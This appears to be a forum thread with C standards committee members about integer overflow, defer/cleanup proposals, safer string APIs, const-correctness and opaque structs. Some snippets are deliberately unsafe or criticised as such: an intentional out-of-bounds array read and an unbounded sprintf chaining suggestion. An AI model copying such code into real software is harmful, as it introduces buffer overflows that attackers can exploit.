I used INT_MAX as the initial value because it was a simple example. Imagine a case where the value happens to be equal to INT_MAX, and then you add 1 to it.

The fact that no result other than INT_MIN makes sense doesn't imply that INT_MIN does make sense. Saturation (having INT_MAX + 1 yield INT_MAX) or reporting an error seem equally sensible. We don't know which behavior is "correct" without knowing anything about the problem domain and what the program is supposed to do.

A likely scenario is that the programmer didn't intend the computation to overflow at all, but the program encountered input that the programmer hadn't anticipated.

INT_MAX + 1 commonly yields INT_MIN because typical hardware happens to work that way. It's not particularly meaningful in mathematical terms.

As for "natural properties", it violates "n + 1 > n". C integers are not, and cannot be, mathematical integers (unless you can restrict values to the range they support).


Could we instead just have standard-defined integer types which saturate or trap on overflow?

Sometimes you're writing code where it really, really matters and you're more than willing to spend the extra cycles for every add/mul/etc. Having these new types as a portable idiom would help.


There was a proposal for a checked integer type that you might want to look at:

N2466 2020/02/09 Svoboda, Towards Integer Safety

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf

The committee asked the proposers for further work on this effort.

Integer types that saturate are an interesting idea. Because signed integer overflow is undefined behavior, implementations are not prohibited from implementing saturation or trapping on overflow.


Eh? I thought that would only be "legal" if it was specified to be implementation-defined behavior. Which would, frankly, be perfectly good. But since it is specified as undefined behavior, programmers are forbidden to use it, and compilers assume it doesn't happen/doesn't exist.

The entire notion that "since this is undefined behavior it does not exist" is the biggest fallacy in modern compilers.


The rule is: If you want your program to conform to the C Standard, then (among other things) your program must not cause any case of undefined behavior. Thus, if you can arrange so that instances of UB will not occur, it doesn't matter that identical code under different circumstances could fail to conform. The safest thing is to make sure that UB cannot be triggered under any circumstances; that is, defensive programming.


Where does that myth come from!? According to the authors of C89 and C99, Undefined Behavior was intended to, among other things, "identify areas of conforming language extension" [their words]. Code which relies upon UB may be non-portable, but the authors of the Standard expressly did not wish to demean such code; that is why they separated out the terms "conforming" and "strictly conforming".


I don't think it's a myth so much as a misunderstanding of terminology. If an implementation defines some undefined behavior from the standard, it stops being undefined behavior at that point (for that implementation) and is no longer something you need to avoid except for portability concerns.

You're exactly right that this is why there is a distinction between conforming and strictly conforming code.


The problem is that under modern interpretation, even if some parts of the Standard and a platform's documentation would define the behavior of some action, the fact that some part of the Standard would regards an overlapping category of constructs as invoking UB overrides everything else.


I could imagine misguided readings of some coding standard advice that would lead to that interpretation, but it's still not an interpretation that makes sense to me.

Implementations define undefined behavior all the time and users rely on it. For instance, POSIX defines that you can convert an object pointer into a function pointer (for dlsym to work), or implementations often rely on offsets from a null pointer for their 'offsetof' macro implementation.


Such an interpretation would be the only way to justify the way the maintainers of clang and gcc actually behave in response to complaints about their compilers' "optimizations".


Beside optimization (as others have pointed out), disallowing wrapping of signed values has the important safety benefit that it permits run-time (and compile-time) detection of arithmetic overflow (e.g. via -fsanitize=signed-integer-overflow). If signed arithmetic were defined to wrap, you could not enable such checks without potentially breaking existing correct code.


Not a question, a request: Please make __attribute__((cleanup)) or the equivalent feature part of the next C standard.

It's used by a lot of current software in Linux, notably systemd and glib2. It solves a major headache with C error handling elegantly. Most compilers already support it internally (since it's required by C++). It has predictable effects, and no impact on performance when not used. It cannot be implemented without help from the compiler.


My idea was to add something like the GoLang defer statement to C (as a function with some special compiler magic). The following is an example of how such a function could be used to cleanup allocated resources regardless of how a function returned:

  int do_something(void) {
    FILE *file1, *file2;
    object_t *obj;
    file1 = fopen("a_file", "w");
    if (file1 == NULL) {
      return -1;
    }
    defer(fclose, file1);
  
    file2 = fopen("another_file", "w");
    if (file2 == NULL) {
      return -1;
    }
    defer(fclose, file2);

    obj = malloc(sizeof(object_t));
    if (obj == NULL) {
      return -1;
    }
    // Operate on allocated resources
    // Clean up everything
    free(obj);  // this could be deferred too, I suppose, for symmetry 
  
    return 0;
  }


Golang gets this wrong. It should be scope-level not function-level (or perhaps there should be two different types, but I have never personally had a need for a function-level cleanup).

Edit: Also please review how attribute cleanup is used by existing C code before jumping into proposals. If something is added to C2x which is inconsistent with what existing code is already doing widely, then it's no help to anyone.


Yes, we have discussed adding this feature at scope level. A not entirely serious proposal was to implement it as follows:

  #define DEFER(a, b, c)  \
     for (bool _flag = true; _flag; _flag = false) \
     for (a; _flag && (b); c, _flag = false)

  int fun() {
     DEFER(FILE *f1 = fopen(...), (NULL != f1), mfclose(f1)) {
       DEFER(FILE *f2 = fopen(...), (NULL != f2), mfclose(f2)) {
         DEFER(FILE *f3 = fopen(...), (NULL != f3), mfclose(f3)) {
             ... do something ...
         }
       }
     }
  }
We are also looking at the attribute cleanup. Sounds like you should be involved in developing this proposal?


Apropos of this, I'll toss in: please support do-after statements (and also let statements).

  do foo(); _After bar();
  /* exactly equivalent to (with gcc ({})s): */
  ({ bar(); foo(); });
  #define DEFER(a, b, c) \
    _Let(a) if(!b) {} else do {c;} _After
(This is in fact a entirely serious proposal, though I don't actually expect it to happen.)


Yes, I'll ask around in Red Hat too, see if we can get some help with this.


Would it make sense for defer to operate on a scope-block, sort of like an if/do/while/for block instead?

That would allow us to write:

   defer close(file);
or:

   defer {
      release_hardware();
      close(port);
   }
I feel like that syntax fits very nicely with other parts of C, and could even potentially lend itself well to some very subtle/creative uses.

I feel like a very C-like defer would:

   - Trigger at the exit of the scope-level where it was declared.

   - Be able to defer a single statement, or a scope-block.

   - Be nestable, since a defer statement just runs its target
     scope-block at the exit of the scope-block where it's defined.

   - Run successive defer statements in LIFO order, allowing later
     defer statements to still use resources that will be cleaned up
     by the earlier ones.


Cleanup on function return is not enough, it needs to be scope exit. We're using this for privilege raising/dropping (example posted above) and also mutex acquisition/release. Both of these really "want" it on the scope level.


Go-like defer() is easily implementable for C using the asm() keyword. Here's an example of how it can be done for x86: https://gist.github.com/jart/aed0fd7a7fa68385d19e76a63db687f...


That's quite an achievement, but you've got to realise that hacks which overwrite the stack return address are not maintainable and likely wouldn't work except for a narrow range of compilers (and even specific versions of those compilers with specific options). It also won't work with stack hardening.

Also it's function-level (like golang) not scope-level (like attribute cleanup). As argued elsewhere in the this thread, golang got this wrong.

Also also, overwriting the return address on the stack kills internal CPU optimizations that both Intel and AMD do for branch prediction.


Maintainable is a point of view. Works fine w/ -fstack-protector for me.

Saying it supports a narrow range of compilers is like saying US two-party system only supports a narrow range of registered voters. Libertarians and Greens absolutely deserve inclusion. They can vote but the system doesn't go out of its way to make life as exciting as possible for them. The above Gist caters to GCC/Clang. Folks who use MSVC, Watcom, etc. absolutely deserve to be supported. The Clang compiled modules can be run through something like objconv and linked into their apps.

Not convinced about scope-level. Supporting docs would help. Sounds like you just want mutex. I'm not sure if I can comment since I can't remember if I've ever written threaded code in C/C++. I would however sheepishly suggest anyone wanting that consider Java due to (a) literally has a class named Phaser come on so cool (b) postmortems I read by webmaster where I once worked.

Not concerned about microoptimizations. All I really wanted was to be able to say stuff like

    const char *s = gc(xasprintf("%s%s", a, b));
Also folks who use those new return trapping security flags might see the branch predictor side-effects as a benefit. Could this really be GC for C with Retpoline for free? I don't know. You decide.


Funny you should mention that, as that feature has come up recently in mailing list discussions. We have not seen an actual proposal for adopting it yet, but features similar semantics are being discussed as a possible idea (no promises).

FWIW, I don't think it would wind up being spelled with attribute syntax because we would likely want programmers to have a guarantee that the cleanup will happen (and attributes can be ignored by the implementation).


Hopefully it'd at least be syntactically similar, so we can have an

  #ifdef __STDC_CLEANUP__
  #define my_cleanup(func) stdc_cleanup(func)
  #else
  #define my_cleanup(func) __attribute__((cleanup(func)))
  #endif
i.e. it would require that it at least goes in the same places as an attribute.


I believe the last proposal was in 2008 (ignore the try..finally stuff here): http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1298.pdf

So I guess it needs someone to take that and update it, also to pull up a full list of current Linux software which is using this feature (which as I say these days is a surprising amount).


Here's our usage: https://github.com/FRRouting/frr/blob/master/lib/privs.h#L14...

  #define frr_with_privs(privs)                                                  \
          for (struct zebra_privs_t *_once = NULL,                               \
                                    *_privs __attribute__(                       \
                                            (unused, cleanup(_zprivs_lower))) =  \
                                            _zprivs_raise(privs, __func__);      \
               _once == NULL; _once = (void *)1)
This gives us a block construct that guarantees elevated privileges are dropped when the block is done:

  frr_with_privs(privs) {
    ... whatever ...
    break;  /* exit block, drop privileges */
    return; /* return, drop privileges */
  }


We have a nice macro for acquiring locks that only applies to the scope:

https://github.com/libguestfs/nbdkit/blob/e58d28d65bfea3af36...

You end up with code like this:

https://github.com/libguestfs/nbdkit/blob/e58d28d65bfea3af36...

It's so useful to be able to be sure the lock is released on all return paths. Also because it's scope-level you can scope your locks tightly to where they are needed.


We use it extensively in our proprietary codebases as well, FWIW. Not real open data for me to point to, but: a few million lines of C, and a handful of billion USD in revenue. If that helps weigh in on "yes, please standardize this common practice."


The standard string library is still pretty bad. This would have been a much better addition for safe strcpy.

Safe strcpy

    char *stecpy(char *d, const char *s, const char *e)
    {
     while (d < e && *s)
      *d++ = *s++;
     if (d < e)
      *d = '\0';
     return d;
    }

    main() {
      char buf[64];
      char *ptr, *end = buf+sizeof(buf) ;

      ptr = stecpy(buf, "hello", end);
      ptr = stecpy(ptr, " world", end);
    }

Existing solutions are still error-prone, requiring continual recalculation of buffer len after each use in a long sequence, when the only thing that matters is where the buffer ends, which is effectively a constant across multiple calls.

What are the chances of getting something like this added to the standard library?


For what it's worth, I personally like this approach, because there are some cases in which it requires less arithmetic in order to be used correctly. And it lends itself better to some forms of static analysis, for similar reasons, in the following sense:

There is the problem of detecting that the function overflows despite being a “safe” function. And there is the problem of precisely predicting what happens after the call, because there might be an undefined behavior in that part of the execution. When writing to, say, a member of a struct, you pass the address of the next member and the analyzer can safely assume that that member and the following ones are not modified. With a function that receives a length, the analyzer has to detect that if the pointer passed points 5 bytes before the end of the destination, the accompanying size it 5, if the pointer points 4 bytes before the end the accompanying size is 4, etc.

This is a much more difficult problem, and as soon as the analyzer fails to capture this information, it appears that the safe function a) might not be called safely and b) might overwrite the following members of the struct.

a) is a false positive, and b) generally implies tons of false positives in the remainder of the analysis.

(In this discussion I assume that you want to allow a call to a memory function to access several members of a struct. You can also choose to forbid this, but then you run into a different problem, which is that C programs do this on purpose more often than you'd think.)


There are many improved versions of string APIs out there, too many in fact to choose from, and most suffer from one flaw or another, depending on one's point of view. Most of my recent proposals to incorporate some that do solve some of the most glaring problems and that have been widely available for a decade or more and are even parts of other standards (POSIX) have been rejected by the committee. I think only memccpy and strdup and strdndup were added for C2X. (See http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2349.htm for an overview.)


> Most of my recent proposals [...] have been rejected by the committee.

Does anyone have insight on why?


memccpy is a very welcome addition in the front of copying strings; what else were you thinking of proposing?


I recently looked at a number of string copying functions, as well as came up with an API a bit similar to yours: https://saagarjha.com/blog/2020/04/12/designing-a-better-str... (mine indicates overflow more clearly). memccpy, which is coming in C2X, makes designing these kinds of things finally possible.


What's wrong with:

    *p += sprintf(*p, "hello");
    *p += sprintf(*p, "world");


Well, that should be `snprintf()` to start with, but even with that, there are issues. The return type of `snprintf()` is `int`, so it can return a negative value if there was some error, so you have to check for that case. That out of the way, a positive return value is (and I'm quoting from the man page on my system) "[i]f the output was truncated due to this limit then the return value is the number of characters which would have been written to the final string if enough space had been available." So to safely use `snprintf()` the code would look something like:

    int size = snprintf(NULL,0,"some format string blah blah ...");
    if (size < 0) error();
    if (size == INT_MAX)
      error(); // because we need one more byte to store the NUL byte
    size++;
    char *p = malloc(size);
    if (p == NULL)
      error();
    int newsize = snprintf(p,size,"some format string blah blabh ... ");
    if (newsize < 0) error();
    if (newsize > size)
    {
      // ... um ... we still got truncated?
    }
Yes, using NULL with `snprintf()` if the size is 0 is allowed by C99 (I just checked the spec).

One thing I've noticed about the C standard library is that is seems adverse to functions allocating memory (outside of `malloc()`, `calloc()` and `realloc()`). I wonder if this has something to do with embedded systems?


Not just embedded systems, also OSes. C's standard library should generally work without the existence of a heap. After all, you have to create the heap using C before you can allocate from it.


malloc is a required part of ISO C, though.


Functions like malloc are only required for hosted implementations. Many operating systems are built using freestanding implementations.

Further, on many platforms, one should avoid using malloc() unless portability is more important than performance or safety. Some operating systems support useful features like the ability to allocate objects with different expected lifetimes in different heaps, so as to help avoid fragmentation, or arrange to have allocations a program can survive without fail while there is still enough memory to handle critical allocations. Any library that insists upon using "malloc()" will be less than ideal for use with any such operating system.


Also, the return type being int means that there's a limit to the length of your string…


Perhaps you meant snprintf. But snprintf can fail on allocation failure, fail if the buffer size is > INT_MAX, and in general isn't very light weight--last time I checked glibc, snprintf was a thin wrapper around the printf machinery and is not for the faint of heart--e.g. initializing a proxy FILE object, lots of malloc interspersed with attempts to avoid malloc by using alloca.

It can also fail on bad format specifiers--not directly irrelevant here except that it forces snprintf to have a signed return value, and mixing signed (the return value) and unsigned (the size limit parameter) types is usually bad hygiene, especially in interfaces intended to obviate buffer overflows.


That could lead to buffer overflow.����


When I wrote that, I had in mind the observation about continued recalculation of buffer len. My suggestion has no such thing. It looks so good that I imagine this was probably how it was intended to be used. With that in mind, isn't it the user's job to know the size of the buffers he's using? Doesn't expecting that the function know about buffer size go against the single responsibility principle?

I'm new to C, in case you couldn't tell.


The problem in practice is that you do not write “hello” and “world” to the destination buffer. You write data that is computed more or less directly from user inputs. Often a malicious user.

So the user only needs to find a way to make the data longer than the developer expected. This may be very simple: the developer may have written a screensaver to accept 20 characters for a password, because who has a longer password than this? Everyone knows that only the first 8 characters matter anyway. (This may have been literally true a long time ago, I think, although it's terrible design. Anyway only 8 characters of hash were stored, so in a sense characters after the first 8 did not buy you as much security as the first 8, even if it was not literally true.)

And this is how there were screensavers that, when you input ~500 characters into the password field, would simply crash and leave the applications they were hiding visible and ready for user input. This is an actual security bug that has happened in actual Unix screensavers. The screensavers were written in C.

And long story short, we have been having the exact same problem approximately once a week for the last 25 years. Many people agree that it is urgent to finally fix this, especially as the consequences are getting worse and worse as computers are more connected.

One solution that some favor is functions that make it easier not to overflow buffers because you tell them the size of the buffer instead of trying to guess in advance how much is enough for all possible data that may be written in the buffer. This is the thing being discussed in this thread. The function sprintf is not a contender in this discussion. The function snprintf could be, if used wisely, but it is a bit unwieldy and the OP's proposal has a specific advantage: you compute the end pointer only once, because this is the invariant.


An analogous seprintf() would probably be a good thing to add too, where the buffer end is passed in instead of a buffer length. I would still have it return a pointer to the end of what was copied. Anyone can calculate the length if they need to, by subtracting the original pointer from the returned pointer.

    char *seprintf(char *str, char *end, const char *format, ...);


I think sprintf and gets can be perfectly secure interfaces. The standard just needs to specify them in a way that causes overflows to raise signals. This is probably more for POSIX and UNIX, since I think it requires the concept of memory mappings. For example:

Start by specifying that memcpy goes by increasing address. This can be done by specifying that no pages to be written by memcpy can be written to until after all pages with lower addresses have been accessed by memcpy. (it is OK to read forwards and then write backwards; the first access must not skip pages)

Next, specify sprintf and gets in terms of memcpy. The output is written as if by memcpy.

The user may then place a PROT_NONE page of memory after the buffer. Since the pages are being accessed by address order, the PROT_NONE page will safely stop the buffer overflow. The user can have a signal handler deal with the problem. It can exit or map in more memory. If we require sprintf and gets to be async-signal-safe, then the signal handler can also siglongjmp out of the problem.


Surely you don’t expect every stack buffer to have a hard page placed after it to protect from overflows?


> With that in mind, isn't it the user's job to know the size of the buffers he's using?

Yes. The user knows the size of his buffer, and then passes that knowledge on to the string constructing functions so that they do not overflow the buffer.

> Doesn't expecting that the function know about buffer size go against the single responsibility principle?

What's single responsibility again? "Execute this one assembly instruction"?

What you want from standard library functions is, usually, "construct a string into this buffer (whose size is N)."


It looks like you'd be dereferencing the pointer p, but you'd also need to make sure that what p points to has enough memory.


Open up WG14 mailing list for non-members?

It's hard to appreciate what's going on at WG14 (or take part) when you can see the results only from afar, with none of the surrounding discussion.

I recently read Jens Gustedt's blog on C2x where he casually recommended this as a way to get involved: "The best is to get involved in the standard’s process by adhering to your national standards body, come to the WG14 meetings and/or subscribing to the committee’s mailing list."

Afaict (from browsing the wg14 site), the mailing list and its archives are not open to access.

https://webcache.googleusercontent.com/search?q=cache:TnEGL4...

EDIT: In general, how is one supposed to approach wg14 with ideas or need for clarification on the standard's wording / interpretation?


> In general, how is one supposed to approach wg14 with ideas or need for clarification on the standard's wording / interpretation?

I'm currently working on an update to the committee website to clarify exactly this sort of thing! Unfortunately, the update is not live yet, but it should hopefully be up Soon™.

Currently, the approach for clarifications and ideas both require you to find someone on the committee to ask the question or champion your proposal for you. We hope to improve this process as part of this website update to make it easier for community collaboration.


In general, the committee accepts what we used to call "defect reports" (now something like "requests for improvement"), assigns them "WG14 series" sequence numbers, and upon requests for "floor time" schedules meeting discussions. Occasional votes are taken, which might trigger modifications to the draft standard. At some point, the committee decides that the updated draft standard is ready for public review, and the various national representatives deal with review comments. All this starts with proposal documents in "WG14 series" form.


Agreed. I would like to get involved, but I don't see any reasonable way for me to do that as an individual.


If an old timer who used to be good with C wanted to use C again, would they have to learn a whole bunch of weird new stuff or could they pretty much use it like they did back in the stone age (i.e., the 20th century)?

Back in the '80s and '90s I was pretty good at C. I don't think there was anything about the language or the compilers than that I did not understand. I used C to write real time multitasking kernels for embedded systems, device drivers and kernel extensions for Unix, Windows, Mac, Netware, and OS/2. I did a Unix port from swapping hardware to paging hardware, rewriting the processes and memory subsystems. I tricked a friend into writing a C compiler. I could hold my own with the language lawyers on comp.lang.c.

Somewhere in there I started using C++, but only as a C with more flexible strings, constructors, destructors, and "for (int i = ...)", and later added STL containers to that.

Sometime in the 2000s, I ended up spending more and more time on smaller programs that were mostly processing text, and Perl became my main tool. Also I ended up spending a lot of helping out less experiences people at work who were doing things in PHP, or JavaScript, or Java. My C and C++ trickled to nothing.

I've occasionally looked at modern C++, but it is so different from what I was doing back in '90s or even early '00s I sometimes have to double check that I'm actually looking at C++ code.

Is modern C like that, or is it still at its core the same language I used to know well?


I'd put it this way -- as someone who writes both C and C++ and has for a long while, I find that the difference between "best practice" C89 and C17 code is not as wide as the difference between "best practice" C++98 and C++17 code. However, this is subjective and may be specific to what kinds of projects I work on, so YMMV.


C17 doesn't look much different than C89. If you are used to K&R C there may be some adjustment but I would expect it to be manageable.

What might perhaps be more challenging is adjusting to the changes in compilers. They tend to optimize code more aggressively and so writing code that closely follows the rules of the language (rather than making assumptions about the underlying hardware, even valid ones) is more important today than it was back in the 80's.


Given the above, it is worth pointing out that the compilers are also much much better in verification and useful warnings/errors. Back in the (very old) days, there was a motivation to cut down PCC (Portable C Compiler) and give the birth to Lint as a separate application (because cutting the compilation time was a greater priority). The current trends are completely the opposite: compilers are getting increasingly more powerful built-in static analyzers and sanitizers by default.

I think the lack of powerful tools in 1990s-2000s contributed to the thought by some that C is 'diffcult' in terms of safety. However, things have moved on.


As additional info,

> Although the first edition of K&R described most of the rules that brought C's type structure to its present form, many programs written in the older, more relaxed style persisted, and so did compilers that tolerated it. To encourage people to pay more attention to the official language rules, to detect legal but suspicious constructions, and to help find interface mismatches undetectable with simple mechanisms for separate compilation, Steve Johnson adapted his pcc compiler to produce lint [Johnson 79b], which scanned a set of files and remarked on dubious constructions.

-- https://www.bell-labs.com/usr/dmr/www/chist.html



The main editing needed to bring "old C" source code up to snuff using a "modern C" compiler is to make sure that the standard header-defined types are used. No more assuming that a lot of things are, by default, int type. A second, related editing pass is to make sure all functions are declared as prototypes, no longer K&R style; K&R style is slated to be deprecated by the next version of the Standard. (There are some rare uses for non-prototyped functions, but evidently the committee thinks there is more benefit in forcing prototypes.)


So the ISO committee breaks the backward compatibility of C in behalf of modernity... but there is C++ guys!

A little effort and you could make C deprecated. ;-)

This makes me think that there are as many C++ gurus than Go(ogle) gurus who want to kill C to be the new Java which brings you a bad coffee from a dirty kitchen.


> but evidently the committee thinks there is more benefit in forcing prototypes

Why?

Consider the following code:

    LetsReconsiderPriorities(n, A)
      int n, A[n];
    {
      return A[n + 1];
    }

    main() {
      static int A[1];
      return LetsReconsiderPriorities(1, A);
    }
Can anyone guess what clang/gcc complain about? They complain about K&R syntax, yet say nothing about the buffer overflow error. Thanks to modern arrays, the overflow can be said to clearly contradict the intentions of the program author. So why aren't compiler authors focusing on that? Rather than showing warnings that I'd say rightfully belong in lint? Note: Same is true with -Wall, [static n], and even [static 1]: compiler complains about language style and ignores real bugs.

I would estimate that roughly 15% of the issues / pull requests that get filed against C language projects are due to these linter errors that accumulated in compilers over the years, based on a quick glance at STB. https://github.com/nothings/stb/issues?q=warning (29 + 132.) / (156 + 794) It's a big obstacle to sharing C code with others. It'd be great if the C Language Committee could ask compiler authors to remove all these distracting warnings like "unused parameter" now that we have amazing tools like runtime sanitizers that deliver real results.

Also, have we considered addressing the prototype problem with the freedom to choose an ILP64 data model instead? How much do prototypes honestly matter in that case? DSO ABI compatibility might be an issue for Linux distros, but it doesn't concern all of us. Also not terribly concerned about 64-bit type promo since 16-bit is usually what fast DSP wants, and the language today doesn't make that easy.

Lastly consider that C was designed at a research laboratory. If there's one thing researchers love to do, it's what I like to call "yolo coding" which is perfectly valid use case of getting experimental / prototyping code written in a way where one needn't care too much about language formalities and best practices. It'd be great if the standards committee acknowledged that as being a legitimate use case (similar to how "high level assembler" is explicitly acknowledged), because future revisions of the language should ideally maintain as much of the original intentions as possible. See also: https://www.lysator.liu.se/c/dmr-on-noalias.html (Note: I think dmr goes too far here, but interesting bit of history to think about, now that everything that isn't char is implicitly noalias!)

In other words, let us choose. Please don't force us.


I'm sort of in the same boat, although I didn't do as much C. (And my interest in getting back into it is more hypothetical.)

Aside from understanding how the language itself has changed, maybe something else to put on the list is how to apply more modern programming practices in C.

In the 90s, I don't think I ever saw C code with unit tests. Any kind of automated testing was pretty rare. I've become convinced that testing in some form is a good thing. If I were going back to C, I'd want to understand the best way to go about that.

People also didn't care (or know) much about security back then. C has some obvious pitfalls (buffer overflows, etc.), and it is pretty important to know good ways to minimize risk. I'd want to understand best practices and techniques for this.

Also, back then build tools were very simple, and some of them were not my favorite things to use (Imake, I'm looking at you). Build tools have advanced a lot since then. Features like reliable, deterministic incremental builds exist now. Some things could be less tedious to configure and maintain. There are probably best practices and preferred choices in build tools, but what exactly they are is another thing I'd want to know.

These are probably not questions that necessarily need an answer from people whose expertise is the language itself, though, so I guess this is a tangent.


People did know about security back then, since it was one of the driving design factors of Burroughs created in 1961, and still sold by Unisys as ClearPath MCP for highly secured deployment environments.

And there were plenty of security related papers and OSes from other companies like IBM, Xerox and DEC.


Is there any plan to deal with the locale fiasco at some point?

Some hints on what I'm referring to can be found here: https://github.com/mpv-player/mpv/commit/1e70e82baa9193f6f02...

Unrelated, but I also miss a binary constant notation (such as 0b10101)


I know that we're not voting, but I miss a binary literal very much. I would also like a literal digit separator to improve readability. Verilog Hardware Description Language does that with an underscore [1]. For example, 0xad_beef to improve readability of a hex literal, and 0b011_1010 to improve readability of a binary literal.

1: http://verilog.renerta.com/mobile/source/vrg00020.htm


If they pick this up, they will likely use C++'s syntax/rules.


In the same vein, I really like being able to use underscores in binary and hex literals to denote subfields in hardware registers.

0xDEADB_EEF

0b1_010_110111001001

etc.


Should take Verilog binary construction syntax, like { 12'd12, 16'hffee, 3'b101 } (or something similar that would fit with C's syntax).


Maybe not.


Why not? If you have to combine bit fields now, it's a mess of shifting and masking.


Many C compilers offer, as an extension, the very binary constant notation that you miss, as anyone who has worked on the front-end of a C static analyzer would tell you.


Yes I'm aware. But we can agree it would be welcome in the standard, isn't it?


Yes, if only so that we (as a category) do not have to discover it exists when already facing C programs that use it.


For binary constant notation, I have incorporated the following macro into my projects: https://gist.github.com/61131/009961b781f387ed1474ffaf19e375...


I haven't read most of that rant, but a thread-local setlocale() would be a godsend. Not sure if that's ISO C or POSIX though.


POSIX has added _l variants taking a locale_t argument to all the relevant string functions. I can see how per-thread state would be convenient, but it's not a comprehensive solution. With the _l variants you can write your own wrappers that pass a per-thread locale_t object.


That's uselocale().


What's the best way to deal with "transitive const-ness", i.e. utility functions that operate on pointers and where the return type should technically get const from the argument?

(strchr is the most obvious, but in general most search/lookup type functions are like this...)

Add to clarify: the current prototype for strchr is

  char *strchr(const char *s, int c);
Which just drops the "const", so you might end up writing to read-only memory without any warning. Ideally there'd be something like:

  maybe_const_out char *strchr(maybe_const_in char *s, int c);
So the return value gets const from the input argument. Maybe this can be done with _Generic? That kinda seems like the "cannonball at sparrows" approach though :/ (Also you'd need to change the official strchr() definition...)


Speaking as someone who is not in the committee but has observed trends since 2003 or so, I would say that solving this problem is way beyond the scope of evolutions that will make it in C2a or even the next one.

There are plenty of programing languages that distinguish strongly between mutable and immutable references, and that have the parametric polymorphism to let functions that can use both kinds return the same thing you passed to them, though. C will simply just never be one of them.


Many uses of strchr do write via a pointer derived from a non-const declaration. When we introduced const qualifier it was noted that they were actually declaring read-only access, not unchangeability. The alternative was tried experimentally and the consequent "const poisoning" got in the way.


I believe C is doing the right thing. Const as immutability is a kludge to force the language to operate at the level of data structure/API design, something that it cannot do properly.


Have you ever used a high-level statically-typed language, e.g. haskell?


The straight-forward approach is just two functions, one with `const` and one without (You can make one of them `static inline` around the other and do some casting to avoid implementing the same thing twice).

With that, selecting the correct function via `_Generic` should be possible (`_Generic` is a bit fiddly, but matching on `const char * ` and `char * ` should work just fine for this), and for the most part this is actually an/the intended use case for `_Generic` - it's basically the same as the type-generic math functions, more or less.


The committee has reviewed a proposal (document N2360) to for const-correct string functions.

But making function signatures const-correct solves only a small part of the problem. A new API can only be used in new code, and casts can remove the constness from pointers leaving open the possibility that poorly written code will inadvertently change the const object. An attempt to change a global variable declared const will in all likelihood crash, but changing a local const can cause much more subtle bugs.

In my view, a more complete solution must include improving the detection of these types bugs in compilers and other static and even dynamic analyzers even without requiring code changes. It's not any more difficult to do that detecting out of bounds accesses. (In full generality it cannot be done just by relying on const; some other annotation is necessary to specify that a function that takes a const pointer doesn't cast the constness away and modify the object regardless.)


One proposal solved this by doing exactly that:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2068.pdf


How about allowing `return` to be used as a qualifier within a function or prototype's argument which, if present, would adjust the qualifiers of the function's return value to match those of the argument, e.g. adding "const" or removing "volatile" as appropriate?

This, if one did:

    char *strchr2(char return *restrict src, char target)
    {
      while(*src)
      {
        if (*src == target) return src;
        src++;
      }
    }
then one version of the function could support both const and non-const usage. BTW, I'd also like to see "register" and "return register" be usable as a qualifiers for pointer-type function parameters which would promise that the passed in pointer wouldn't "escape", or else that it could only escape through the return value (so a compiler that could see everything done with the return value wouldn't have to worry about the argument escaping).


strchr() is one of several C library functions that have this issue.

C++ solved this by overloading strchr():

    const char *strchr(const char *s, int c);
    char *strchr(*char *s, int c);
C of course doesn't have overloading.

One solution could have been to define two functions with different names, perhaps "strchr" and "strcchr". The time to do that would have been 1989, when the original ANSI C standard was published.

I suppose a future C standard could leave strchr() as it is (necessary to avoid breaking existing code) and add two new functions.


A lot C programmers prefer to keep structures within the C source file ("module"), as a poor man's encapsulation. For example:

component.h:

    struct obj;
    typedef struct obj obj_t;

    obj_t *obj_create(void);
    // .. the rest of the API
component.c:

    struct obj {
        int status;
        // .. whatever else
    };

    obj_t *
    obj_create(void)
    {
        return calloc(1, sizeof(obj_t));
    }
However, as the component grows in complexity, it often becomes necessary to separate out some of the functionality (in order to re-abstract and reduce the complexity) into a another file or files, which also operate on "struct obj". So, we move the structure into a header file under #ifdef __COMPONENT_PRIVATE (and/or component_impl.h) and sprinkle #define __COMPONENT_PRIVATE in the component source files. It's a poor man's "namespaces".

Basically, this boils down to the lack namespaces/packages/modules in C. Are you aware of any existing compiler extensions (as a precedent or work in that direction) which could provide a better solution and, perhaps, one day end up in the C standard?

P.S. And if C will ever grow such feature, I really hope it will NOT be the C++ 'namespace' (amongst many other depressing things in C++). :)


I am sorry I do not have an answer to your question. It's a very valid one and I would be interested in any pointer to an answer.

What I can say while we are on the subject, is that I have seen C code (most often C code that started its life in the 1990s, to be fair) that instead of showing an abstract struct in the public interface, showed a different struct definition.

Please don't do this. Yes, when compiling nowadays, eventually every compilation unit ends up as object files passed to a linker that doesn't know about types, but this is undefined behavior. It makes it difficult to find undefined behavior in the rest of the code because there is a big undefined behavior right in the middle of it.


Wait, doesn't this mean that the BSD sockets API is inherently dependent on UB, casing different socket types to each other and sometimes only using the first few members, or am I misunderstanding you?


Yes and no.

The thing I am describing is when you link a compilation unit using:

  struct internal_state { int dummy; } state;
with another compilation unit that defined the same state differently:

  struct internal_state {
     int actual_meaningful_member_1;
     unsigned long actual_meaningful_member_2; } state;
As far as I know, BSD socked do not do this. Zlib was doing this (https://github.com/pascal-cuoq/zlib-fork/blob/a52f0241f72433... ), but I have had the privilege of discussing this with Mark Adler, and I think the no-longer-necessary hack was removed from Zlib.

BSD sockets probably have a different kind of UB, related to so-call “strict aliasing” rules, unless they have been carefully audited and revised since the carefree times in which they were written. I am going to have to let you read this article for details (example st1, page 5): https://trust-in-soft.com/wp-content/uploads/2017/01/vmcai.p...


BSD sockets are weird in that the first struct's (sockaddr) size wasn't big enough, so APIs all take a nominal pointer to sockaddr but may require larger storage (sockaddr_storage) depending on the actual address.

  /*
   * Structure used by kernel to store most
   * addresses.
   */
  struct sockaddr {
          unsigned char   sa_len;         /* total length */
          sa_family_t     sa_family;      /* address family */
          char            sa_data[14];    /* actually longer; address value */
  };


  /*
   * RFC 2553: protocol-independent placeholder for socket addresses
   */
  #define _SS_MAXSIZE     128U
  #define _SS_ALIGNSIZE   (sizeof(__int64_t))
  #define _SS_PAD1SIZE    (_SS_ALIGNSIZE - sizeof(unsigned char) - \
                              sizeof(sa_family_t))
  #define _SS_PAD2SIZE    (_SS_MAXSIZE - sizeof(unsigned char) - \
                              sizeof(sa_family_t) - _SS_PAD1SIZE - _SS_ALIGNSIZE)
  
  struct sockaddr_storage {
          unsigned char   ss_len;         /* address length */
          sa_family_t     ss_family;      /* address family */
          char            __ss_pad1[_SS_PAD1SIZE];
